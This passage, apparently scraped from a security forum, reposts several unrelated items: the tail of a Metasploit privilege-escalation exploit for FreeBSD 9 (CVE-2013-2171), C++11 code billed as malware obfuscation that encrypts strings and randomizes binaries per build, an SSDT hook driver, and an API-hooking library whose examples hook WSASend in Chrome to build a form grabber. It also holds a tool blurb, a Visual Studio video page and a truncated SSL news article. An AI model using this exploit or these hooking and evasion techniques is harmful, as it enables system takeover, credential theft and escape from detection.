'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ] ], 'Targets' => [ [ 'FreeBSD x86', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => "Jun 18 2013", } )) register_options([ # It isn't OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), ], self.class) end def check res = session.shell_command_token("uname -a") return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/ Exploit::CheckCode::Safe end def write_file(fname, data) oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\" session.shell_command_token("printf \"#{oct_data}\" > #{fname}") session.shell_command_token("chmod +x #{fname}") chk = session.shell_command_token("file #{fname}") return (chk =~ /ERROR: cannot open/) ? false : true end def upload_payload fname = datastore['WritableDir'] fname = "#{fname}/" unless fname =~ %r'/$' if fname.length > 36 fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters") end fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}" p = generate_payload_exe f = write_file(fname, p) return nil if not f fname end def generate_exploit(payload_fname) # # Metasm does not support FreeBSD executable generation. # path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin") x = File.open(path, 'rb') { |f| f.read(f.stat.size) } x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00")) end def upload_exploit(payload_fname) fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}" bin = generate_exploit(payload_fname) f = write_file(fname, bin) return nil if not f fname end def exploit payload_fname = upload_payload fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil? print_status("Payload #{payload_fname} uploaded.") exploit_fname = upload_exploit(payload_fname) fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil? print_status("Exploit #{exploit_fname} uploaded.") register_files_for_cleanup(payload_fname, exploit_fname) print_status("Executing #{exploit_fname}") cmd_exec(exploit_fname) end end Sursa: FreeBSD 9 Address Space Manipulation Privilege Escalation
-
[TABLE] [TR] [TD=align: justify][TABLE=width: 100%] [TR] [TD=align: justify]Hidden File Finder is the free software to quickly scan and discover all the Hidden files on your Windows system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=align: justify] It performs swift multi threaded scan of all the folders parallely and quickly uncovers all the hidden files. It automatically detects the Hidden Executable Files (EXE, DLL, COM etc) and shows them in red color for easier identification. Similarly 'Hidden Files' are shown in black color and 'Hiddden Folders' are shown in blue color. One of its main feature is the Unhide Operation. You can select one or all of the discovered Hidden files and Unhide them with just a click. Successful 'Unhide operations' are shown in green background color while failed ones are shown in yellow background. It is very easy to use with its cool GUI interface. Particularly, it will be more handy for Penetration testers and Forensic investigators. It is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Features[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Free, Easy to use GUI based Software Fast multi threaded Hidden File finder to quickly scan entire computer, drive or folder. Unhide all the Hidden files with one click. Color based representation of Hidden Files/Folders/Executable Files and Unhide operations. Open the folder in explorer by double clicking on the List Sort feature to arrange the Hidden files based on name/size/type/date/path Detailed hidden file scan report in HTML format Fully portable and can be run from anywhere Also includes Installer for local installation/un-installation [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 1: Hidden File Finder showing all the Hidden files/folders discovered during the scan[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Screenshot 2: Detailed HTML Report of Hidden File scanning operation.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Release History[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 1.0: 25th Jun 2013[/TD] [/TR] [TR] [TD]First public release of HiddenFileFinder[/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download Hidden File Finder v1.0 License : Freeware Platform : Windows XP, 2003, Vista, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] Sursa: Hidden File Finder : Free Tool to Find and Unhide/Remove all the Hidden Files | www.SecurityXploded.com
-
[h=1]Visual Studio 2013 Preview[/h]By: Robert Green Visual Studio 2013 Preview is here with lots of exciting new features across Windows Store, Desktop and Web development. Dmitry Lyalin joins Robert for a whirlwind tour of this preview of the next release of Visual Studio, which is now available for download. Dmitry and Robert show the following in this episode: Recap of Team Foundation Service announcements from TechEd [02:00], including Team Rooms for collaboration, Code Comments in changesets, mapping backlog items to features IDE improvements [11:00], including more color and redesigned icons, undockable Pending Changes window, Connected IDE and synchronized settings Productivity improvements [17:00], including CodeLens indicators showing references, changes and unit test results, enhanced scrollbar, Peek Definition for inline viewing of definitions Web development improvements [28:00], including Browser Link for connecting Visual Studio directly to browsers, One ASP.NET Debugging and diagnostics improvements [37:00], including edit and continue in 64-bit projects, managed memory analysis in memory dump files, Performance and Diagnostics hub to centralize analysis tools [44:00], async debugging [51:00] Windows Store app development improvements, including new project templates [40:00], Energy Consumption and XAML UI Responsiveness Analyzers [45:00], new controls in XAML and JavaScript [55:00], enhanced IntelliSense and Go To Definition in XAML files [1:00:00] Visual Studio 2013 and Windows 8.1: Visual Studio 2013 Preview download Visual Studio 2013 Preview announcement Windows 8.1 Preview download Windows 8.1 Preview announcement Additional resources: Visual Studio team blog Brian Harry's blog ALM team blog Web tools team blog Modern Application Lifecycle Management talk at TechEd Microsoft ASP.NET, Web, and Cloud Tools Preview talk at TechEd Using Visual Studio 2013 to Diagnose .NET Memory Issues in Production What's new in XAML talk at Build What's new in WinJS talk at Build [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 58.9 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 355.3 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 174.0 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 781.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 545.2 MB High Quality WMV (PC, Xbox, MCE) Sursa: Visual Studio 2013 Preview | Visual Studio Toolbox | Channel 9
-
[h=1]Malware related compile-time hacks with C++11[/h]by LeFF Hello, community! This code shows how some features of the new C++11 standard can be used to randomly and automaticaly obfuscate code for every build you make (so for every build you will have different hash-values, different encrypted strings and so on)... I decided to show examples on random code generation, string hashing and string encryption only, as more complex ones gets much harder to read... Code is filled with comments and pretty self-explanatory, but if you have some questions, feel free to ask... Hope this stuff will be useful for you, guys! #include <stdio.h> #include <stdint.h> //-------------------------------------------------------------// // "Malware related compile-time hacks with C++11" by LeFF // // You can use this code however you like, I just don't really // // give a shit, but if you feel some respect for me, please // // don't cut off this comment when copy-pasting... ;-) // //-------------------------------------------------------------// // Usage examples: void exampleRandom1() __attribute__((noinline)); void exampleRandom2() __attribute__((noinline)); void exampleHashing() __attribute__((noinline)); void exampleEncryption() __attribute__((noinline)); #ifndef vxCPLSEED // If you don't specify the seed for algorithms, the time when compilation // started will be used, seed actually changes the results of algorithms... #define vxCPLSEED ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \ (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \ (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) #endif // The constantify template is used to make sure that the result of constexpr // function will be computed at compile-time instead of run-time template <uint32_t Const> struct vxCplConstantify { enum { Value = Const }; }; // Compile-time mod of a linear congruential pseudorandom number generator, // the actual algorithm was taken from "Numerical Recipes" book constexpr uint32_t vxCplRandom(uint32_t Id) { return (1013904223 + 1664525 * ((Id > 0) ? (vxCplRandom(Id - 1)) : (vxCPLSEED))) & 0xFFFFFFFF; } // Compile-time random macros, can be used to randomize execution // path for separate builds, or compile-time trash code generation #define vxRANDOM(Min, Max) (Min + (vxRAND() % (Max - Min + 1))) #define vxRAND() (vxCplConstantify<vxCplRandom(__COUNTER__ + 1)>::Value) // Compile-time recursive mod of string hashing algorithm, // the actual algorithm was taken from Qt library (this // function isn't case sensitive due to vxCplTolower) constexpr char vxCplTolower(char Ch) { return (Ch >= 'A' && Ch <= 'Z') ? (Ch - 'A' + 'a') : (Ch); } constexpr uint32_t vxCplHashPart3(char Ch, uint32_t Hash) { return ((Hash << 4) + vxCplTolower(Ch)); } constexpr uint32_t vxCplHashPart2(char Ch, uint32_t Hash) { return (vxCplHashPart3(Ch, Hash) ^ ((vxCplHashPart3(Ch, Hash) & 0xF0000000) >> 23)); } constexpr uint32_t vxCplHashPart1(char Ch, uint32_t Hash) { return (vxCplHashPart2(Ch, Hash) & 0x0FFFFFFF); } constexpr uint32_t vxCplHash(const char* Str) { return (*Str) ? (vxCplHashPart1(*Str, vxCplHash(Str + 1))) : (0); } // Compile-time hashing macro, hash values changes using the first pseudorandom number in sequence #define vxHASH(Str) (uint32_t)(vxCplConstantify<vxCplHash(Str)>::Value ^ vxCplConstantify<vxCplRandom(1)>::Value) // Compile-time generator for list of indexes (0, 1, 2, ...) template <uint32_t...> struct vxCplIndexList {}; template <typename IndexList, uint32_t Right> struct vxCplAppend; template <uint32_t... Left, uint32_t Right> struct vxCplAppend<vxCplIndexList<Left...>, Right> { typedef vxCplIndexList<Left..., Right> Result; }; template <uint32_t N> struct vxCplIndexes { typedef typename vxCplAppend<typename vxCplIndexes<N - 1>::Result, N - 1>::Result Result; }; template <> struct vxCplIndexes<0> { typedef vxCplIndexList<> Result; }; // Compile-time string encryption of a single character const char vxCplEncryptCharKey = vxRANDOM(0, 0xFF); constexpr char vxCplEncryptChar(const char Ch, uint32_t Idx) { return Ch ^ (vxCplEncryptCharKey + Idx); } // Compile-time string encryption class template <typename IndexList> struct vxCplEncryptedString; template <uint32_t... Idx> struct vxCplEncryptedString<vxCplIndexList<Idx...> > { char Value[sizeof...(Idx) + 1]; // Buffer for a string // Compile-time constructor constexpr inline vxCplEncryptedString(const char* const Str) : Value({ vxCplEncryptChar(Str[Idx], Idx)... }) {} // Run-time decryption char* decrypt() { for(uint32_t t = 0; t < sizeof...(Idx); t++) { this->Value[t] = this->Value[t] ^ (vxCplEncryptCharKey + t); } this->Value[sizeof...(Idx)] = '\0'; return this->Value; } }; // Compile-time string encryption macro #define vxENCRYPT(Str) (vxCplEncryptedString<vxCplIndexes<sizeof(Str) - 1>::Result>(Str).decrypt()) // A small random code path example void exampleRandom1() { switch(vxRANDOM(1, 4)) { case 1: { printf("exampleRandom1: Code path 1!\n"); break; } case 2: { printf("exampleRandom1: Code path 2!\n"); break; } case 3: { printf("exampleRandom1: Code path 3!\n"); break; } case 4: { printf("exampleRandom1: Code path 4!\n"); break; } default: { printf("Fucking poltergeist!\n"); } } } // A small random code generator example void exampleRandom2() { volatile uint32_t RndVal = vxRANDOM(0, 100); if(vxRAND() % 2) { RndVal += vxRANDOM(0, 100); } else { RndVal -= vxRANDOM(0, 200); } printf("exampleRandom2: %d\n", RndVal); } // A small string hasing example void exampleHashing() { printf("exampleHashing: 0x%08X\n", vxHASH("hello world!")); printf("exampleHashing: 0x%08X\n", vxHASH("HELLO WORLD!")); } void exampleEncryption() { printf("exampleEncryption: %s\n", vxENCRYPT("Hello world!")); } extern "C" void Main() { exampleRandom1(); exampleRandom2(); exampleHashing(); exampleEncryption(); } To build code with GCC/MinGW I used this command: g++ -o main.exe -m32 -std=c++0x -Wall -O3 -Os -fno-exceptions -fno-rtti -flto -masm=intel -e_Main -nostdlib -O3 -Os -flto -s main.cpp -lmsvcrt Compiled binary returs this, as expected: exampleRandom1: Code path 2! exampleRandom2: 145 exampleHashing: 0x2D13947A exampleHashing: 0x2D13947A exampleEncryption: Hello world! Decompiled code, that was generated by compiler: exampleRandom1 proc near var_18= dword ptr -18h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_18], offset aExamplerandom1 ; "exampleRandom1: Code path 2!" call puts leave retn exampleRandom1 endp exampleRandom2 proc near var_28= dword ptr -28h var_24= dword ptr -24h var_C= dword ptr -0Ch push ebp mov ebp, esp sub esp, 28h mov [ebp+var_C], 78 mov eax, [ebp+var_C] mov [esp+28h+var_28], offset aExamplerandom2 ; "exampleRandom2: %d\n" add eax, 67 mov [ebp+var_C], eax mov eax, [ebp+var_C] mov [esp+28h+var_24], eax call printf leave retn exampleRandom2 endp exampleHashing proc near var_18= dword ptr -18h var_14= dword ptr -14h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf leave retn exampleHashing endp exampleEncryption proc near var_28= dword ptr -28h var_24= dword ptr -24h var_15= byte ptr -15h var_14= byte ptr -14h var_13= byte ptr -13h var_12= byte ptr -12h var_11= byte ptr -11h var_10= byte ptr -10h var_F= byte ptr -0Fh var_E= byte ptr -0Eh var_D= byte ptr -0Dh var_C= byte ptr -0Ch var_B= byte ptr -0Bh var_A= byte ptr -0Ah var_9= byte ptr -9 push ebp xor eax, eax mov ebp, esp mov ecx, 0Dh push edi lea edi, [ebp+var_15] sub esp, 24h rep stosb xor eax, eax mov [ebp+var_15], 4Ah mov [ebp+var_14], 66h mov [ebp+var_13], 68h mov [ebp+var_12], 69h mov [ebp+var_11], 69h mov [ebp+var_10], 27h mov [ebp+var_F], 7Fh mov [ebp+var_E], 66h mov [ebp+var_D], 78h mov [ebp+var_C], 67h mov [ebp+var_B], 68h mov [ebp+var_A], 2Ch loc_401045: lea ecx, [eax+2] xor [ebp+eax+var_15], cl inc eax cmp eax, 0Ch lea edx, [ebp+var_15] jnz short loc_401045 mov [esp+28h+var_24], edx mov [esp+28h+var_28], offset aExampleencrypt ; "exampleEncryption: %s\n" mov [ebp+var_9], 0 call printf add esp, 24h pop edi pop ebp retn exampleEncryption endp [h=4]Attached Files[/h] main.rar 650bytes 68 downloads Sursa: Malware related compile-time hacks with C++11 - rohitab.com - Forums
-
[h=1]My first SSDT hook driver[/h]by zwclose7 Hello, this is my first SSDT hook driver. My driver will hook NtTerminateProcess, NtLoadDriver, NtOpenProcess and NtDeleteValueKey. NtTerminateProcess hook This hook will protect any process named calc.exe from being terminated. NtLoadDriver hook This hook will display the driver name in the debugger/DebugView. NtOpenProcess hook This hook will deny access to any process named cmd.exe, and will return STATUS_ACCESS_DENIED if the process name match. NtDeleteValueKey hook This hook will protect any values named abcdef from being deleted. To load the driver, run the loader.exe in the release folder. This program will install the driver to the system, and then load it. All functions will be unhooked when the driver unloads. [h=4]Attached Files[/h] SSDTHook.zip 287.99K 39 downloads Sursa: My first SSDT hook driver - rohitab.com - Forums zwclose7
-
[h=1]ExtendedHook Functions c++[/h]By RosDevil [intro] I decided to give away one of my master sources, a bauch of functions that are really useful to hook APIs (or any address) on x86 machines. (i'm writing a x64 version, will be published as soon as possible) ExtendedHook.h 1.46K 17 downloads ExtendedHook.cpp 3.21K 9 downloads [index] This page is divided so: - Function Documentation - EHOOKSTRUCT structure - Usage - Compiler settings and notes to remember - Example 1# - hooking MessageBox - Example 2# - hooking DirectX (version 9 in this case) - Example 3# - hooking WSASend [Functions Documentation] There are 3 main functions (InstallEHook, InstallEHookEx, CustomEHook) and 1 to unhook (UnistallEHook). //InstallEHook bool InstallEHook( LPCSTR API, LPCTSTR lib, PEHOOKSTRUCT EHookA, void * redit ); PARAMETERS LPCSTR API: the name of the API LPCTSTR lib: module name or path PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. RETURN VALUE If the function succeeds it returns true, otherwise false. REMARKS This function first tries to get the module through GetModuleHandle of the given dll name or path, if it fails, it tries a LoadLibrary. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //InstallEHookEx bool InstallEHookEx( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit ); PARAMETERS void * TargetAddress: in this case function you give the address of the function to hook. This function is needed especially when you try to hook a function which you don't have the definition but only the address. (See Example 2# to understand better) PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. RETURN VALUE If the function succeeds it returns true, otherwise false. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //CustomEHook bool CustomEHook( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit, unsigned int bytes_jmp ); PARAMETERS void * TargetAddress: in this case function you give the address of the function to hook. This function is needed especially when you try to hook a function which you don't have the definition but only the address. (See Example 2# to understand better) PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. unsigned int bytes_jmp: integer that cointains the number of bytes that must be copied to hook. This function is specific for the address of strange APIs that might have a particular beginning signature that the above functions don't recognize, mostly you will use this when trying to hook an address in the middle of an API, not at the beginning. RETURN VALUE If the function succeeds it returns true, otherwise false. REMARKS This function is can easily crash if you are not careful, it does not check anything and the given bytes don't corrispond to the end of a specific instruction you won't be able to call the original API, if you do it, it will crash. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //UnistallEHook void * UninstallEHook( PEHOOKSTRUCT EHookA ); PARAMETER PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT to unistall the hook. RETURN VALUE If the function succeeds it returns the original address of the API, otherwise NULL. [EHOOKSTRUCT structure] This structure is the core of these functions. typedef struct _EHOOKSTRUCT{ DWORD * adr_init; DWORD * adr_redirect; DWORD * adr_new_api; DWORD bytes_size; }EHOOKSTRUCT, *PEHOOKSTRUCT; MEMBERS DWORD * adr_init: Stores the original address DWORD * adr_redirect: Stores the address of the hook function DWORD * adr_new_api: Stores the address of the NEW API DWORD bytes_size: Number of bytes copied to perform the hook [usage] This is a general summary how to use these functions. It's easier if you look at the examples. #include "ExtendedHook.h" typedef -type- ( -Api Prototype- ) ( -parameters- ); EHOOKSTRUCT api_tohook; //define a function exately the same of the prototype -type- Api_function_hook ( -parameters- ); -type- Api_function_hook ( -parameters- ){ //here you can manage the paramters return ((-Api Prototype-)api_hook.adr_new_api) (- parameters -); //perform the call with any paramters you want, right parameters or changed } int main(){ if (InstallEHook("-Api name-", "-Api module-", &api_tohook, &Api_function_hook) == false){ printf("Error hooking"); return 1; } return 0; } [Compiler settings and notes to remember] This hooking method requires one change in the compiler settings. - Disable intrinsic functions [VC++] Project -> Properties -> Configuration Property -> C/C++ -> Optimization -> Enable Intrinsic Functions -> [No] Notes - When you define the function protoype and its function hook, it must be the same of the orginal API, no changes in the parameters count, moreover remember to put WINAPI (__stdcall) in the definition when is needed, otherwise it won't work. - There are some APIs that are necessary for any other api, like GetModuleHandle, GetProcAddress, LoadLibrary... if you want to hook these APIs remember not to call any other API inside the hook function that requires them, otherwise you will obtain an infinite loop. [Example 1# - hooking MessageBox] #include "stdafx.h" #include "windows.h" #include <iostream> #include "ExtendedHook.h" using namespace std; typedef int (WINAPI * pMessageBox)(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types); //function prototype int WINAPI MessageBoxWHooker(HWND myhandle, LPCTSTR text, LPCTSTR caption, UINT types); //function hook EHOOKSTRUCT myApi; //essential structure pMessageBox myMessageBox = NULL; //optional, but i think it is useful int _tmain(int argc, _TCHAR* argv[]) { if (InstallEHook("MessageBoxW", L"User32.dll", &myApi, &MessageBoxWHooker) == false){ wcout<<"Error hooking"<<endl; return 1; } myMessageBox = (pMessageBox)myApi.adr_new_api; //[optional] this will be a MessageBox without hook myMessageBox(0, L"Hooking is my speciality!", L"ROSDEVIL", MB_OK | MB_ICONWARNING); if (MessageBox(0, L"Hi, did you understand?", L"ehi", MB_YESNO) == IDYES) {//this will be hooked! wcout<<"You have pressed yes"<<endl; }else{ wcout<<"You have pressed no"<<endl; } UninstallEHook(&myApi); cin.get(); return 0; } int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types){ wcout<<"-- MessageBoxW hooked!"<<endl; wcout<<"HWND: "<<myhandle<<endl; wcout<<"Text: "<<text<<endl; wcout<<"Caption: "<<caption<<endl; wcout<<"Buttons/Icon: "<<types<<endl; return ((pMessageBox)myApi.adr_new_api)(myhandle, text, caption, types); } [Example 2# - hooking DirectX (version 9 in this case)] This is an cool example, a dll that must be injected from the very beginning of the game. If you delve into DirectX hooking you will know what i'm talking about. It has been tested on Age of Empires 3 (x86). //AgeOfEmpireHook.dll #include "stdafx.h" #include "windows.h" #include "d3dx9.h" #include "ExtendedHook.h" #pragma comment(lib, "d3dx9.lib") void start_hooking(); void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height); int times_load = 0; typedef DWORD D3DCOLOR; IDirect3DDevice9 * DeviceInterface; //hook Direct3DCreate9 typedef IDirect3D9 *(WINAPI * pDirect3DCreate9) (UINT SDKVersion); EHOOKSTRUCT api_Direct3DCreate9; IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion); //hook CreateDevice typedef HRESULT (APIENTRY * pCreateDevice)( IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface ); EHOOKSTRUCT api_CreateDevice; HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface); //Hook EndScene typedef HRESULT (WINAPI * pEndScene)(IDirect3DDevice9 * pDevInter); EHOOKSTRUCT api_EndScene; HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("Direct3DCreate9", L"d3d9.dll", &api_Direct3DCreate9, &Direct3DCreate9_Hook)==false){ MessageBox(0, L"Error while hooking Direct3DCreate9", L"Hooker", MB_OK | MB_ICONWARNING); } return; } IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion){ IDirect3D9 * pDev = ((pDirect3DCreate9)api_Direct3DCreate9.adr_new_api)(SDKVersion); _asm pushad DWORD * vtable = (DWORD*)*((DWORD*)pDev); //VTABLE if (times_load == 1){ //the first time d3d9.dll is used, isn't for the game making, we need the second InstallEHookEx((void*)vtable[16], &api_CreateDevice, &CreateDevice_hook); } times_load += 1; _asm popad return pDev; } HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface){ HRESULT final = ((pCreateDevice)api_CreateDevice.adr_new_api)(pDev, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface); _asm pushad DWORD * DevInterface = (DWORD*)*((DWORD*)*ppReturnedDeviceInterface); //VTABLE InstallEHookEx((void*)DevInterface[42], &api_EndScene, &EndScene_hook); //EndScene _asm popad return final; } HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter){ _asm pushad WriteText(pDevInter, L"AGE OF EMPIRES EXTENDED HOOK BY ROSDEVIL", 20, 20, 300, 50); if (GetAsyncKeyState(VK_F1))WriteText(pDevInter, L"Hooked functions:\n - CreateDevice\n - EndScene\n", 20, 50, 150, 100); _asm popad return ((pEndScene)api_EndScene.adr_new_api)(pDevInter); } void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height){ ID3DXFont *m_font; D3DXCreateFont(d3ddev, 15, 0, FW_BOLD, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, TEXT("Arial"), &m_font ); D3DCOLOR fontColor1 = D3DCOLOR_XRGB(255, 0, 0); RECT space; space.top = y; space.left = x; space.right = width + x; space.bottom = height + y; m_font->DrawText(NULL, text, -1, &space, 0, fontColor1); m_font->Release(); } [Example 3# - hooking WSASend] This example is again a dll, but doesn't require to be injected at the very beginning since the function that we are going to hook doesn't belong to a any class. It has been tested on Chrome to create a FormGrabber. //ChromeHook.dll #include "stdafx.h" #include "windows.h" #include "ExtendedHook.h" bool first = true; void start_hooking(); //I don't want to include all winsock.h so let's declare want we need: //(you can include winsock.h, it's quicker) typedef unsigned int SOCKET; typedef void* LPWSAOVERLAPPED_COMPLETION_ROUTINE; typedef struct __WSABUF { unsigned long len; char FAR *buf; } WSABUF, *LPWSABUF; typedef struct _WSAOVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; }; PVOID Pointer; }; HANDLE hEvent; } WSAOVERLAPPED, *LPWSAOVERLAPPED; //hook WSASend typedef int (WINAPI * pWSASend)( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); EHOOKSTRUCT api_WSASend; int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("WSASend", L"Ws2_32.dll", &api_WSASend, &WSASend_hook)==false){ MessageBox(0, L"Error while hooking WSASend", L"Hooker", MB_OK | MB_ICONWARNING); } } int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ){ _asm pushad if (first == true){ //only show the first time a call is intercepted MessageBox(0, L"WSASEND FIRST INTERCEPTED!", L"CHROME HOOK", MB_OK); first = false; } //NOW WE CAN HANDLE, CRACK, COPY, ALTER, SMASH, ABORT all it's parameters! //... your code man ... _asm popad return ((pWSASend)api_WSASend.adr_new_api)(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpOverlapped, lpCompletionRoutine); } Well, we're done! PUT LIKE IF YOU APPRECIATE I've updated my ExtendedHook.cpp, there were a little bug about the bytes to copy. [see attachment] RosDevil Sursa: ExtendedHook Functions c++ - rohitab.com - Forums
-
A simple SSL tweak could protect you from GCHQ/NSA snooping
Nytro posted a topic in Stiri securitate
[h=1]A simple SSL tweak could protect you from GCHQ/NSA snooping[/h][h=2]It might slow you down, but hey, you can't have everything[/h] By John Leyden, 26th June 2013 An obscure feature of SSL/TLS called Forward Secrecy may offer greater privacy, according to security experts who have begun promoting the technology in the wake of revelations about mass surveillance by the NSA and GCHQ. Every SSL connection begins with a handshake, during which the two parties in an encrypted message exchange perform authentication and agree on their session keys, through a process called key exchange. The session keys are used for a limited time and deleted afterwards. The key exchange phase is designed to allow two users to exchange keys without allowing an eavesdropper to intercept or capture these credentials. Several key exchange mechanisms exist but the most widely used mechanism is based on the well-known RSA algorithm, explains Ivan Ristic, director of engineering at Qualys. This approach relies on the server's private key to protect session keys. "This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server's private key can also uncover the session keys and thus decrypt everything," Ristic warns. This capability makes it possible for enterprise security tools - such as intrusion detection and web application firewalls - to screen otherwise undecipherable SSL encrypted traffic, given a server’s private keys. This feature has become a serious liability in the era of mass surveillance. GCHQ have been secretly tapping hundreds of fibre-optic cables to tap data, The Guardian reported 